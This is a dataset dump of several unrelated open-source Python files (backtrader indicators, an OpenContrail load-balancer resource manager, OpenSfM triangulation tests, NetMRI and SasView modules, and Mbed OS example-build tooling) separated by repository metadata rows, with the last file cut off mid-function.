# You should have received a copy of the GNU General Public License
# along with this program. If not, see <http://www.gnu.org/licenses/>.
#
###############################################################################
from __future__ import (absolute_import, division, print_function,
unicode_literals)
from backtrader import Indicator
from backtrader.functions import *
# The modules below should/must define __all__ with the Indicator objects
# of prepend an "_" (underscore) to private classes/variables
from .basicops import *
# base for moving averages
from .mabase import *
# moving averages (so envelope and oscillators can be auto-generated)
from .sma import *
from .ema import *
from .smma import *
from .wma import *
from .dema import *
from .kama import *
from .zlema import *
from .hma import *
from .zlind import *
from .dma import *
# depends on moving averages
from .deviation import *
# depend on basicops, moving averages and deviations
from .atr import *
from .aroon import *
from .bollinger import *
from .cci import *
from .crossover import *
from .dpo import *
from .directionalmove import *
from .envelope import *
from .heikinashi import *
from .lrsi import *
from .macd import *
from .momentum import *
from .oscillator import *
from .percentchange import *
from .percentrank import *
from .pivotpoint import *
from .prettygoodoscillator import *
from .priceoscillator import *
from .psar import *
from .rsi import *
from .stochastic import *
from .trix import *
from .tsi import *
from .ultimateoscillator import *
from .williams import *
from .rmi import *
from .awesomeoscillator import *
from .accdecoscillator import *
from .dv2 import * # depends on percentrank
# Depends on Momentum
from .kst import *
from .ichimoku import *
from .hurst import *
from .ols import *
from .hadelta import *
| 28.076923 | 79 | 0.699413 | true | true | |
f72eb6919b6ff61569dadd031bc009867b1f62b7 | 8,984 | py | Python | neutron_plugin_contrail/plugins/opencontrail/loadbalancer/resource_manager.py | bailkeri/contrail-neutron-plugin | de41d381729d6750db6ee84f4f8ec241c1830ad3 | [
"Apache-2.0"
] | null | null | null | neutron_plugin_contrail/plugins/opencontrail/loadbalancer/resource_manager.py | bailkeri/contrail-neutron-plugin | de41d381729d6750db6ee84f4f8ec241c1830ad3 | [
"Apache-2.0"
] | null | null | null | neutron_plugin_contrail/plugins/opencontrail/loadbalancer/resource_manager.py | bailkeri/contrail-neutron-plugin | de41d381729d6750db6ee84f4f8ec241c1830ad3 | [
"Apache-2.0"
] | null | null | null | #
# Copyright (c) 2014 Juniper Networks, Inc. All rights reserved.
#
from abc import ABCMeta, abstractmethod, abstractproperty
from eventlet import greenthread
from neutron.common import exceptions as n_exc
from neutron.extensions import loadbalancer
from neutron.plugins.common import constants
from vnc_api.vnc_api import NoIdError, RefsExistError
import six
import uuid
class LoadbalancerMethodInvalid(n_exc.BadRequest):
message = _("Method %(lb_method)s not supported for pool %(pool_id)s")
@six.add_metaclass(ABCMeta)
class ResourceManager(object):
_max_project_read_attempts = 3
def __init__(self, api):
self._api = api
@abstractproperty
def property_type_mapping(self):
""" Mapping from property name to neutron dict key.
"""
pass
@abstractmethod
def make_properties(self, resource):
""" Returns the properties for the specified resource.
"""
pass
@abstractmethod
def make_dict(self, resource, fields):
""" Return the contrail api resource in the dictionary format
expected by neutron.
"""
pass
@abstractmethod
def resource_read(self, id):
""" Read the specified resource from the api server.
"""
pass
@abstractmethod
def resource_list(self, tenant_id):
""" Returns the list of objects from the api server.
"""
pass
@abstractmethod
def resource_update(self, obj):
""" Call the update method.
"""
pass
@abstractmethod
def resource_delete(self, id):
""" Delete the specified resource from the api server.
"""
pass
@abstractproperty
def get_exception_notfound(self, id):
""" Returns the correct NotFound exception.
"""
pass
@abstractproperty
def get_exception_inuse(self, id):
""" Returns the correct NotFound exception.
"""
pass
@abstractproperty
def neutron_name(self):
""" Resource name in a request from neutron.
"""
pass
@abstractproperty
def resource_name_plural(self):
""" Resource list name in a list response from api server.
"""
pass
@abstractmethod
def create(self, context, resource):
""" Create resource.
"""
pass
@abstractmethod
def update_properties(self, obj, id, resource):
""" Update the resource properties
"""
return False
def update_object(self, obj, id, resource):
""" Update object metadata other than properties
"""
return False
def _get_tenant_id_for_create(self, context, resource):
if context.is_admin and 'tenant_id' in resource:
tenant_id = resource['tenant_id']
elif ('tenant_id' in resource and
resource['tenant_id'] != context.tenant_id):
reason = 'Cannot create resource for another tenant'
raise n_exc.AdminRequired(reason=reason)
else:
tenant_id = context.tenant_id
return tenant_id
def _get_resource_name(self, resource, parent, name, uuid):
""" Generate an unique name. This is display name if there are
no conflicts or display_name + uuid.
"""
fq_name = list(parent.fq_name)
fq_name.append(name)
try:
obj = self._api.fq_name_to_id(resource, fq_name)
except NoIdError:
return name
return name + '-' + uuid
def _is_authorized(self, context, resource):
return context.is_admin or context.tenant_id == resource['tenant_id']
def _project_read(self, project_id):
""" Reads the project from the api server. The project will be
created it does not yet exist.
"""
for i in range(self._max_project_read_attempts):
try:
return self._api.project_read(id=str(uuid.UUID(project_id)))
except NoIdError:
pass
greenthread.sleep(1)
raise n_exc.TenantNetworksDisabled()
def _fields(self, resource, fields):
if fields:
return dict(((key, item) for key, item in resource.items()
if key in fields))
return resource
def _apply_filter(self, resource, filters):
if filters is None:
return True
for key, value in filters.iteritems():
if key in resource and not resource[key] in value:
return False
return True
def _get_object_status(self, obj):
id_perms = obj.get_id_perms()
if id_perms and id_perms.enable:
return constants.ACTIVE
return constants.PENDING_DELETE
def _get_object_description(self, obj):
id_perms = obj.get_id_perms()
if id_perms is None:
return None
return id_perms.description
def _get_object_tenant_id(self, obj):
proj_fq_name = obj.get_fq_name()[0:2]
try:
proj = self._api.project_read(fq_name=proj_fq_name)
except NoIdError:
return None
return proj.uuid
def get_resource(self, context, id, fields=None):
""" Implement GET by uuid.
"""
try:
obj = self.resource_read(id=id)
except NoIdError:
raise self.get_exception_notfound(id=id)
tenant_id = str(uuid.UUID(context.tenant_id))
project_id = self._get_object_tenant_id(obj)
if not context.is_admin and tenant_id != project_id:
raise self.get_exception_notfound(id=id)
return self.make_dict(obj, fields)
def _get_resource_dict(self, uuid, filters, fields):
try:
obj = self.resource_read(id=uuid)
except NoIdError:
return None
res = self.make_dict(obj, None)
if not self._apply_filter(res, filters):
return None
return self._fields(res, fields)
def get_collection(self, context, filters=None, fields=None):
""" Generic implementation of list command.
"""
response = []
if filters and 'id' in filters:
for v in filters['id']:
res = self._get_resource_dict(v, filters, fields)
if res is not None and self._is_authorized(context, res):
response.append(res)
return response
tenant_id = None
if not context.is_admin:
tenant_id = context.tenant_id
obj_list = self.resource_list(tenant_id=tenant_id)
if self.resource_name_plural not in obj_list:
return response
for v in obj_list[self.resource_name_plural]:
res = self._get_resource_dict(v['uuid'], filters, fields)
if res is not None:
response.append(res)
return response
def delete(self, context, id):
if not context.is_admin:
try:
obj = self.resource_read(id=id)
except NoIdError:
raise self.get_exception_notfound(id=id)
tenant_id = str(uuid.UUID(context.tenant_id))
project_id = self._get_object_tenant_id(obj)
if tenant_id != project_id:
raise n_exc.NotAuthorized()
try:
self.resource_delete(id=id)
except NoIdError:
raise self.get_exception_notfound(id=id)
except RefsExistError:
raise self.get_exception_inuse(id=id)
def update_properties_subr(self, props, resource):
""" Update the DB properties object from the neutron parameters.
"""
change = False
for key, mapping in self.property_type_mapping.iteritems():
if mapping not in resource:
continue
if getattr(props, key) != resource[mapping]:
setattr(props, key, resource[mapping])
change = True
return change
def update(self, context, id, resource):
""" Update the resource.
"""
try:
obj = self.resource_read(id=id)
except NoIdError:
raise self.get_exception_notfound(id=id)
id_perms = obj.get_id_perms()
if not id_perms or not id_perms.enable:
raise loadbalancer.StateInvalid(id=id,
state=constants.PENDING_DELETE)
r = resource[self.neutron_name]
if r:
update = False
if 'description' in r and id_perms.description != r['description']:
id_perms.description = r['description']
obj.set_id_perms(id_perms)
update = True
if self.update_properties(obj, id, r):
update = True
if self.update_object(obj, id, r):
update = True
if update:
self.resource_update(obj)
return self.make_dict(obj)
| 30.662116 | 79 | 0.598508 |
from abc import ABCMeta, abstractmethod, abstractproperty
from eventlet import greenthread
from neutron.common import exceptions as n_exc
from neutron.extensions import loadbalancer
from neutron.plugins.common import constants
from vnc_api.vnc_api import NoIdError, RefsExistError
import six
import uuid
class LoadbalancerMethodInvalid(n_exc.BadRequest):
message = _("Method %(lb_method)s not supported for pool %(pool_id)s")
@six.add_metaclass(ABCMeta)
class ResourceManager(object):
_max_project_read_attempts = 3
def __init__(self, api):
self._api = api
@abstractproperty
def property_type_mapping(self):
pass
@abstractmethod
def make_properties(self, resource):
pass
@abstractmethod
def make_dict(self, resource, fields):
pass
@abstractmethod
def resource_read(self, id):
pass
@abstractmethod
def resource_list(self, tenant_id):
pass
@abstractmethod
def resource_update(self, obj):
pass
@abstractmethod
def resource_delete(self, id):
pass
@abstractproperty
def get_exception_notfound(self, id):
pass
@abstractproperty
def get_exception_inuse(self, id):
pass
@abstractproperty
def neutron_name(self):
pass
@abstractproperty
def resource_name_plural(self):
pass
@abstractmethod
def create(self, context, resource):
pass
@abstractmethod
def update_properties(self, obj, id, resource):
return False
def update_object(self, obj, id, resource):
return False
def _get_tenant_id_for_create(self, context, resource):
if context.is_admin and 'tenant_id' in resource:
tenant_id = resource['tenant_id']
elif ('tenant_id' in resource and
resource['tenant_id'] != context.tenant_id):
reason = 'Cannot create resource for another tenant'
raise n_exc.AdminRequired(reason=reason)
else:
tenant_id = context.tenant_id
return tenant_id
def _get_resource_name(self, resource, parent, name, uuid):
fq_name = list(parent.fq_name)
fq_name.append(name)
try:
obj = self._api.fq_name_to_id(resource, fq_name)
except NoIdError:
return name
return name + '-' + uuid
def _is_authorized(self, context, resource):
return context.is_admin or context.tenant_id == resource['tenant_id']
def _project_read(self, project_id):
for i in range(self._max_project_read_attempts):
try:
return self._api.project_read(id=str(uuid.UUID(project_id)))
except NoIdError:
pass
greenthread.sleep(1)
raise n_exc.TenantNetworksDisabled()
def _fields(self, resource, fields):
if fields:
return dict(((key, item) for key, item in resource.items()
if key in fields))
return resource
def _apply_filter(self, resource, filters):
if filters is None:
return True
for key, value in filters.iteritems():
if key in resource and not resource[key] in value:
return False
return True
def _get_object_status(self, obj):
id_perms = obj.get_id_perms()
if id_perms and id_perms.enable:
return constants.ACTIVE
return constants.PENDING_DELETE
def _get_object_description(self, obj):
id_perms = obj.get_id_perms()
if id_perms is None:
return None
return id_perms.description
def _get_object_tenant_id(self, obj):
proj_fq_name = obj.get_fq_name()[0:2]
try:
proj = self._api.project_read(fq_name=proj_fq_name)
except NoIdError:
return None
return proj.uuid
def get_resource(self, context, id, fields=None):
try:
obj = self.resource_read(id=id)
except NoIdError:
raise self.get_exception_notfound(id=id)
tenant_id = str(uuid.UUID(context.tenant_id))
project_id = self._get_object_tenant_id(obj)
if not context.is_admin and tenant_id != project_id:
raise self.get_exception_notfound(id=id)
return self.make_dict(obj, fields)
def _get_resource_dict(self, uuid, filters, fields):
try:
obj = self.resource_read(id=uuid)
except NoIdError:
return None
res = self.make_dict(obj, None)
if not self._apply_filter(res, filters):
return None
return self._fields(res, fields)
def get_collection(self, context, filters=None, fields=None):
response = []
if filters and 'id' in filters:
for v in filters['id']:
res = self._get_resource_dict(v, filters, fields)
if res is not None and self._is_authorized(context, res):
response.append(res)
return response
tenant_id = None
if not context.is_admin:
tenant_id = context.tenant_id
obj_list = self.resource_list(tenant_id=tenant_id)
if self.resource_name_plural not in obj_list:
return response
for v in obj_list[self.resource_name_plural]:
res = self._get_resource_dict(v['uuid'], filters, fields)
if res is not None:
response.append(res)
return response
def delete(self, context, id):
if not context.is_admin:
try:
obj = self.resource_read(id=id)
except NoIdError:
raise self.get_exception_notfound(id=id)
tenant_id = str(uuid.UUID(context.tenant_id))
project_id = self._get_object_tenant_id(obj)
if tenant_id != project_id:
raise n_exc.NotAuthorized()
try:
self.resource_delete(id=id)
except NoIdError:
raise self.get_exception_notfound(id=id)
except RefsExistError:
raise self.get_exception_inuse(id=id)
def update_properties_subr(self, props, resource):
change = False
for key, mapping in self.property_type_mapping.iteritems():
if mapping not in resource:
continue
if getattr(props, key) != resource[mapping]:
setattr(props, key, resource[mapping])
change = True
return change
def update(self, context, id, resource):
try:
obj = self.resource_read(id=id)
except NoIdError:
raise self.get_exception_notfound(id=id)
id_perms = obj.get_id_perms()
if not id_perms or not id_perms.enable:
raise loadbalancer.StateInvalid(id=id,
state=constants.PENDING_DELETE)
r = resource[self.neutron_name]
if r:
update = False
if 'description' in r and id_perms.description != r['description']:
id_perms.description = r['description']
obj.set_id_perms(id_perms)
update = True
if self.update_properties(obj, id, r):
update = True
if self.update_object(obj, id, r):
update = True
if update:
self.resource_update(obj)
return self.make_dict(obj)
| true | true |
f72eb75b52c1111f421c3e6bb21b6e69eee64a93 | 2,707 | py | Python | opensfm/test/test_triangulation.py | vik748/OpenSfM | bd949246e3e0d6d3a707a08224038034d27e3ee8 | [
"BSD-2-Clause"
] | null | null | null | opensfm/test/test_triangulation.py | vik748/OpenSfM | bd949246e3e0d6d3a707a08224038034d27e3ee8 | [
"BSD-2-Clause"
] | 3 | 2021-06-08T22:22:02.000Z | 2022-03-12T00:47:52.000Z | opensfm/test/test_triangulation.py | smarvar/sfm_smarvar | 569144c26df860cfa45d183f7701d0414e35d086 | [
"BSD-2-Clause"
] | null | null | null | import numpy as np
import networkx as nx
from opensfm import io
from opensfm import pygeometry
from opensfm import reconstruction
from opensfm import pysfm
def test_track_triangulator_equirectangular():
"""Test triangulating tracks of spherical images."""
tracks_manager = pysfm.TracksManager()
tracks_manager.add_observation('im1', '1', pysfm.Observation(0, 0, 1.0, 0, 0, 0, 0))
tracks_manager.add_observation('im2', '1', pysfm.Observation(-0.1, 0, 1.0, 0, 0, 0, 1))
rec = io.reconstruction_from_json({
"cameras": {
"theta": {
"projection_type": "equirectangular",
"width": 800,
"height": 400,
}
},
"shots": {
'im1': {
"camera": "theta",
"rotation": [0.0, 0.0, 0.0],
"translation": [0.0, 0.0, 0.0],
},
'im2': {
"camera": "theta",
"rotation": [0, 0, 0.0],
"translation": [-1, 0, 0.0],
},
},
"points": {
},
})
triangulator = reconstruction.TrackTriangulator(tracks_manager, rec)
triangulator.triangulate('1', 0.01, 2.0)
assert '1' in rec.points
p = rec.points['1'].coordinates
assert np.allclose(p, [0, 0, 1.3763819204711])
assert len(rec.points['1'].get_observations()) == 2
def unit_vector(x):
return np.array(x) / np.linalg.norm(x)
def test_triangulate_bearings_dlt():
rt1 = np.append(np.identity(3), [[0], [0], [0]], axis=1)
rt2 = np.append(np.identity(3), [[-1], [0], [0]], axis=1)
b1 = unit_vector([0.0, 0, 1])
b2 = unit_vector([-1.0, 0, 1])
max_reprojection = 0.01
min_ray_angle = np.radians(2.0)
res, X = pygeometry.triangulate_bearings_dlt(
[rt1, rt2], [b1, b2], max_reprojection, min_ray_angle)
assert np.allclose(X, [0, 0, 1.0])
assert res is True
def test_triangulate_bearings_midpoint():
o1 = np.array([0.0, 0, 0])
b1 = unit_vector([0.0, 0, 1])
o2 = np.array([1.0, 0, 0])
b2 = unit_vector([-1.0, 0, 1])
max_reprojection = 0.01
min_ray_angle = np.radians(2.0)
res, X = pygeometry.triangulate_bearings_midpoint(
[o1, o2], [b1, b2], 2 * [max_reprojection], min_ray_angle)
assert np.allclose(X, [0, 0, 1.0])
assert res is True
def test_triangulate_two_bearings_midpoint():
o1 = np.array([0.0, 0, 0])
b1 = unit_vector([0.0, 0, 1])
o2 = np.array([1.0, 0, 0])
b2 = unit_vector([-1.0, 0, 1])
max_reprojection = 0.01
min_ray_angle = np.radians(2.0)
X = pygeometry.triangulate_two_bearings_midpoint([o1, o2], [b1, b2])
assert np.allclose(X, [0, 0, 1.0])
| 30.41573 | 91 | 0.569634 | import numpy as np
import networkx as nx
from opensfm import io
from opensfm import pygeometry
from opensfm import reconstruction
from opensfm import pysfm
def test_track_triangulator_equirectangular():
tracks_manager = pysfm.TracksManager()
tracks_manager.add_observation('im1', '1', pysfm.Observation(0, 0, 1.0, 0, 0, 0, 0))
tracks_manager.add_observation('im2', '1', pysfm.Observation(-0.1, 0, 1.0, 0, 0, 0, 1))
rec = io.reconstruction_from_json({
"cameras": {
"theta": {
"projection_type": "equirectangular",
"width": 800,
"height": 400,
}
},
"shots": {
'im1': {
"camera": "theta",
"rotation": [0.0, 0.0, 0.0],
"translation": [0.0, 0.0, 0.0],
},
'im2': {
"camera": "theta",
"rotation": [0, 0, 0.0],
"translation": [-1, 0, 0.0],
},
},
"points": {
},
})
triangulator = reconstruction.TrackTriangulator(tracks_manager, rec)
triangulator.triangulate('1', 0.01, 2.0)
assert '1' in rec.points
p = rec.points['1'].coordinates
assert np.allclose(p, [0, 0, 1.3763819204711])
assert len(rec.points['1'].get_observations()) == 2
def unit_vector(x):
return np.array(x) / np.linalg.norm(x)
def test_triangulate_bearings_dlt():
rt1 = np.append(np.identity(3), [[0], [0], [0]], axis=1)
rt2 = np.append(np.identity(3), [[-1], [0], [0]], axis=1)
b1 = unit_vector([0.0, 0, 1])
b2 = unit_vector([-1.0, 0, 1])
max_reprojection = 0.01
min_ray_angle = np.radians(2.0)
res, X = pygeometry.triangulate_bearings_dlt(
[rt1, rt2], [b1, b2], max_reprojection, min_ray_angle)
assert np.allclose(X, [0, 0, 1.0])
assert res is True
def test_triangulate_bearings_midpoint():
o1 = np.array([0.0, 0, 0])
b1 = unit_vector([0.0, 0, 1])
o2 = np.array([1.0, 0, 0])
b2 = unit_vector([-1.0, 0, 1])
max_reprojection = 0.01
min_ray_angle = np.radians(2.0)
res, X = pygeometry.triangulate_bearings_midpoint(
[o1, o2], [b1, b2], 2 * [max_reprojection], min_ray_angle)
assert np.allclose(X, [0, 0, 1.0])
assert res is True
def test_triangulate_two_bearings_midpoint():
o1 = np.array([0.0, 0, 0])
b1 = unit_vector([0.0, 0, 1])
o2 = np.array([1.0, 0, 0])
b2 = unit_vector([-1.0, 0, 1])
max_reprojection = 0.01
min_ray_angle = np.radians(2.0)
X = pygeometry.triangulate_two_bearings_midpoint([o1, o2], [b1, b2])
assert np.allclose(X, [0, 0, 1.0])
| true | true |
f72eb7cef44043a2b1295eb4b8935af5db17e752 | 1,064 | py | Python | infoblox_netmri/api/remote/models/device_viewer_open_services_grid_remote.py | infobloxopen/infoblox_netmri | aa1c744df7e439dbe163bb9edd165e4e85a9771b | [
"Apache-2.0"
] | 12 | 2016-02-19T12:37:54.000Z | 2022-03-04T20:11:08.000Z | infoblox_netmri/api/remote/models/device_viewer_open_services_grid_remote.py | infobloxopen/infoblox_netmri | aa1c744df7e439dbe163bb9edd165e4e85a9771b | [
"Apache-2.0"
] | 18 | 2015-11-12T18:37:00.000Z | 2021-05-19T07:59:55.000Z | infoblox_netmri/api/remote/models/device_viewer_open_services_grid_remote.py | infobloxopen/infoblox_netmri | aa1c744df7e439dbe163bb9edd165e4e85a9771b | [
"Apache-2.0"
] | 18 | 2016-01-07T12:04:34.000Z | 2022-03-31T11:05:41.000Z | from ..remote import RemoteModel
class DeviceViewerOpenServicesGridRemote(RemoteModel):
"""
| ``id:`` none
| ``attribute type:`` string
| ``DeviceID:`` none
| ``attribute type:`` string
| ``DataSourceID:`` none
| ``attribute type:`` string
| ``ipaddress:`` none
| ``attribute type:`` string
| ``ListenAddr:`` none
| ``attribute type:`` string
| ``PortProtocol:`` none
| ``attribute type:`` string
| ``Port:`` none
| ``attribute type:`` string
| ``ExpectedService:`` none
| ``attribute type:`` string
| ``Service:`` none
| ``attribute type:`` string
| ``PortTimestamp:`` none
| ``attribute type:`` string
"""
properties = ("id",
"DeviceID",
"DataSourceID",
"ipaddress",
"ListenAddr",
"PortProtocol",
"Port",
"ExpectedService",
"Service",
"PortTimestamp",
)
| 20.461538 | 54 | 0.470865 | from ..remote import RemoteModel
class DeviceViewerOpenServicesGridRemote(RemoteModel):
properties = ("id",
"DeviceID",
"DataSourceID",
"ipaddress",
"ListenAddr",
"PortProtocol",
"Port",
"ExpectedService",
"Service",
"PortTimestamp",
)
| true | true |
f72eb800bacb5e3e23d6174f7e147ea13700f6c0 | 1,887 | py | Python | test/sascalculator/utest_sas_gen.py | llimeht/sasview | d0c10746a2397c5021ed8bbc842ba99243a9b0ac | [
"BSD-3-Clause"
] | null | null | null | test/sascalculator/utest_sas_gen.py | llimeht/sasview | d0c10746a2397c5021ed8bbc842ba99243a9b0ac | [
"BSD-3-Clause"
] | null | null | null | test/sascalculator/utest_sas_gen.py | llimeht/sasview | d0c10746a2397c5021ed8bbc842ba99243a9b0ac | [
"BSD-3-Clause"
] | null | null | null | """
Unit tests for the sas_gen
"""
import os.path
import warnings
warnings.simplefilter("ignore")
import unittest
import numpy as np
from sas.sascalc.calculator import sas_gen
def find(filename):
return os.path.join(os.path.dirname(__file__), 'data', filename)
class sas_gen_test(unittest.TestCase):
def setUp(self):
self.sldloader = sas_gen.SLDReader()
self.pdbloader = sas_gen.PDBReader()
self.omfloader = sas_gen.OMFReader()
def test_sldreader(self):
"""
Test .sld file loaded
"""
f = self.sldloader.read(find("sld_file.sld"))
self.assertEqual(f.pos_x[0], -40.5)
self.assertEqual(f.pos_y[0], -13.5)
self.assertEqual(f.pos_z[0], -13.5)
def test_pdbreader(self):
"""
Test .pdb file loaded
"""
f = self.pdbloader.read(find("c60.pdb"))
self.assertEqual(f.pos_x[0], -0.733)
self.assertEqual(f.pos_y[0], -1.008)
self.assertEqual(f.pos_z[0], 3.326)
def test_omfreader(self):
"""
Test .omf file loaded
"""
f = self.omfloader.read(find("A_Raw_Example-1.omf"))
output = sas_gen.OMF2SLD()
output.set_data(f)
self.assertEqual(f.mx[0], 0)
self.assertEqual(f.my[0], 0)
self.assertEqual(f.mz[0], 0)
self.assertEqual(output.pos_x[0], 0.0)
self.assertEqual(output.pos_y[0], 0.0)
self.assertEqual(output.pos_z[0], 0.0)
def test_calculator(self):
"""
Test that the calculator calculates.
"""
f = self.omfloader.read(find("A_Raw_Example-1.omf"))
omf2sld = sas_gen.OMF2SLD()
omf2sld.set_data(f)
model = sas_gen.GenSAS()
model.set_sld_data(omf2sld.output)
x = np.linspace(0, 0.1, 11)[1:]
model.runXY([x, x])
if __name__ == '__main__':
unittest.main()
| 25.5 | 68 | 0.594065 |
import os.path
import warnings
warnings.simplefilter("ignore")
import unittest
import numpy as np
from sas.sascalc.calculator import sas_gen
def find(filename):
return os.path.join(os.path.dirname(__file__), 'data', filename)
class sas_gen_test(unittest.TestCase):
def setUp(self):
self.sldloader = sas_gen.SLDReader()
self.pdbloader = sas_gen.PDBReader()
self.omfloader = sas_gen.OMFReader()
def test_sldreader(self):
f = self.sldloader.read(find("sld_file.sld"))
self.assertEqual(f.pos_x[0], -40.5)
self.assertEqual(f.pos_y[0], -13.5)
self.assertEqual(f.pos_z[0], -13.5)
def test_pdbreader(self):
f = self.pdbloader.read(find("c60.pdb"))
self.assertEqual(f.pos_x[0], -0.733)
self.assertEqual(f.pos_y[0], -1.008)
self.assertEqual(f.pos_z[0], 3.326)
def test_omfreader(self):
f = self.omfloader.read(find("A_Raw_Example-1.omf"))
output = sas_gen.OMF2SLD()
output.set_data(f)
self.assertEqual(f.mx[0], 0)
self.assertEqual(f.my[0], 0)
self.assertEqual(f.mz[0], 0)
self.assertEqual(output.pos_x[0], 0.0)
self.assertEqual(output.pos_y[0], 0.0)
self.assertEqual(output.pos_z[0], 0.0)
def test_calculator(self):
f = self.omfloader.read(find("A_Raw_Example-1.omf"))
omf2sld = sas_gen.OMF2SLD()
omf2sld.set_data(f)
model = sas_gen.GenSAS()
model.set_sld_data(omf2sld.output)
x = np.linspace(0, 0.1, 11)[1:]
model.runXY([x, x])
if __name__ == '__main__':
unittest.main()
| true | true |
f72eb836bf1ae0ede245207bbaad409be8cbc77e | 22,844 | py | Python | tools/test/examples/examples_lib.py | Eric-A-Marks/mbed-os | 4ba07d9413fbf7bae2db97a06e4eb4f275063d93 | [
"Apache-2.0"
] | 2 | 2021-01-28T09:12:02.000Z | 2021-01-28T11:03:26.000Z | tools/test/examples/examples_lib.py | Eric-A-Marks/mbed-os | 4ba07d9413fbf7bae2db97a06e4eb4f275063d93 | [
"Apache-2.0"
] | 7 | 2019-04-11T10:12:18.000Z | 2020-10-27T12:54:57.000Z | tools/test/examples/examples_lib.py | Eric-A-Marks/mbed-os | 4ba07d9413fbf7bae2db97a06e4eb4f275063d93 | [
"Apache-2.0"
] | 2 | 2016-07-21T12:40:27.000Z | 2016-07-22T11:29:19.000Z | #!/usr/bin/env python
"""
Copyright (c) 2017-2019 ARM Limited. All rights reserved.
SPDX-License-Identifier: Apache-2.0
Licensed under the Apache License, Version 2.0 (the "License");
you may not use this file except in compliance with the License.
You may obtain a copy of the License at
http://www.apache.org/licenses/LICENSE-2.0
Unless required by applicable law or agreed to in writing, software
distributed under the License is distributed on an "AS IS" BASIS,
WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
See the License for the specific language governing permissions and
limitations
"""
import os
from os.path import dirname, abspath, basename, join, normpath
import os.path
import sys
import copy
import stat
import subprocess
from shutil import rmtree
import json
import logging
logging.basicConfig(level=logging.DEBUG, format='[EXAMPLES]> %(levelname)-8s %(message)s')
""" Import and bulid a bunch of example programs
This library includes functions that are shared between the examples.py and
the update.py modules.
"""
MBED_OS_ROOT = abspath(dirname(dirname(dirname(dirname(__file__)))))
CWD = os.getcwd()
sys.path.insert(0, MBED_OS_ROOT)
from tools.build_api import get_mbed_official_release
from tools.targets import TARGET_MAP
from tools.export import EXPORTERS
from tools.project import EXPORTER_ALIASES
from tools.toolchains import TOOLCHAINS
from tools.utils import write_json_to_file
from prettytable import PrettyTable
SUPPORTED_TOOLCHAINS = list(TOOLCHAINS - set(u'uARM'))
SUPPORTED_IDES = [exp for exp in list(EXPORTERS) + list(EXPORTER_ALIASES)
if exp != "cmsis" and exp != "zip"]
def get_table_from_pretty_table(pretty_table):
rows = []
for pretty_row in pretty_table:
row = {}
for key in pretty_table.field_names:
pretty_row.border = False
pretty_row.header = False
row[key] = pretty_row.get_string(fields=[key]).strip()
rows.append(row)
return rows
def get_build_summary(results):
"""Prints to screen the complication results of example programs.
Args:
results - results of the compilation stage. which is the output of compile_repos()
Returns: Numbers of failed results
"""
pass_table = PrettyTable()
pass_table.field_names = ["EXAMPLE NAME", "TARGET", "TOOLCHAIN", "TEST GEN", "BUILD RESULT"]
pass_table.align["EXAMPLE NAME"] = "l"
fail_table = copy.deepcopy(pass_table)
failure_counter = 0
for exp, status in list(results.items()):
for summary in status[2]:
pass_table.add_row([summary["name"], summary["target"], summary["toolchain"], summary["test"], "PASSED"])
for summary in status[3]:
fail_table.add_row([summary["name"], summary["target"], summary["toolchain"], summary["test"], "FAILED"])
failure_counter+=1
print("\n\nPassed Example Compilation:")
print(pass_table)
if (failure_counter > 0):
print("\n\nFailed Example Compilation:")
print(fail_table)
print("Number of failures = %d" % failure_counter)
# output build information to json file
rows = get_table_from_pretty_table(pass_table) + get_table_from_pretty_table(fail_table)
with open("build_data.json", "w") as write_file:
json.dump(rows, write_file, indent=4, sort_keys=True)
return failure_counter
def get_export_summary(results):
"""Prints to screen the exporting results of example programs.
Args:
results - results of the compilation stage. which is the output of and export_repos()
Returns: Numbers of failed results
"""
pass_table = PrettyTable()
pass_table.field_names = ["EXAMPLE NAME", "TARGET", "IDE", "EXPORT RESULT", "BUILD RESULT"]
pass_table.align["EXAMPLE NAME"] = "l"
fail_table = copy.deepcopy(pass_table)
failure_counter = 0
for exp, status in list(results.items()):
for summary in status[2]:
pass_table.add_row([summary["name"], summary["target"], summary["ide"], "PASSED", "PASSED"])
for summary in status[3]:
fail_table.add_row([summary["name"], summary["target"], summary["ide"], "FAILED", ""])
failure_counter+=1
for summary in status[4]:
fail_table.add_row([summary["name"], summary["target"], summary["ide"], "PASSED", "FAILED"])
failure_counter+=1
for summary in status[5]:
pass_table.add_row([summary["name"], summary["target"], summary["ide"], "PASSED", "SKIPPED"])
print("\n\nPassed Example Exporting:")
print(pass_table)
if (failure_counter > 0):
print("\n\nFailed Example Exporting:")
print(fail_table)
print("Number of failures = %d" % failure_counter)
return failure_counter
def valid_choices(allowed_choices, all_choices):
if len(allowed_choices) > 0:
return [t for t in all_choices if t in allowed_choices]
else:
return all_choices
def target_cross_toolchain(allowed_targets, allowed_toolchains, features=[]):
"""Generate pairs of target and toolchains
Args:
allowed_targets - a list of all possible targets
allowed_toolchains - a list of all possible toolchains
Kwargs:
features - the features that must be in the features array of a
target
"""
for target in allowed_targets:
for toolchain in allowed_toolchains:
if all(feature in TARGET_MAP[target].features
for feature in features):
yield target, toolchain
def target_cross_ide(allowed_targets, allowed_ides, features=[], toolchains=[]):
"""Generate pairs of target and ides
Args:
allowed_targets - a list of all possible targets
allowed_ides - a list of all possible IDEs
Kwargs:
features - the features that must be in the features array of a
target
"""
for target in allowed_targets:
for ide in allowed_ides:
if (EXPORTERS[ide].is_target_supported(target) and
(not toolchains or EXPORTERS[ide].TOOLCHAIN in toolchains) and
all(feature in TARGET_MAP[target].features
for feature in features)):
yield target, ide
def get_sub_examples_list(example):
""" Get the names of sub examples. if no sub examples, return the name of main example"""
sub_examples = []
if example['sub-repo-example']:
for sub in example['subs']:
sub_examples.append("%s/%s" % (example["name"], sub))
else:
sub_examples.append(example["name"])
return sub_examples
def source_repos(config, exp_filter):
""" Imports each of the repos and its dependencies (.lib files) associated
with the specific examples name from the json config file. Note if
there is already a clone of the repo then it will first be removed to
ensure a clean, up to date cloning.
Args:
config - the json object imported from the file.
"""
print("\nImporting example repos....\n")
for example in config['examples']:
name = example['name']
if name in exp_filter:
if os.path.exists(name):
logging.warning("'%s' example directory already exists. Deleting..." % name)
rmtree(name)
cmd = "mbed-cli import %s" % example['github']
logging.info("Executing command '%s'..." % cmd)
result = subprocess.call(cmd, shell=True)
if result:
return result
return 0
def clone_repos(config, exp_filter , retry = 3):
""" Clones each of the repos associated with the specific examples name from the
json config file. Note if there is already a clone of the repo then it will first
be removed to ensure a clean, up to date cloning.
Args:
config - the json object imported from the file.
"""
print("\nCloning example repos....\n")
for example in config['examples']:
name = example['name']
if name in exp_filter:
if os.path.exists(name):
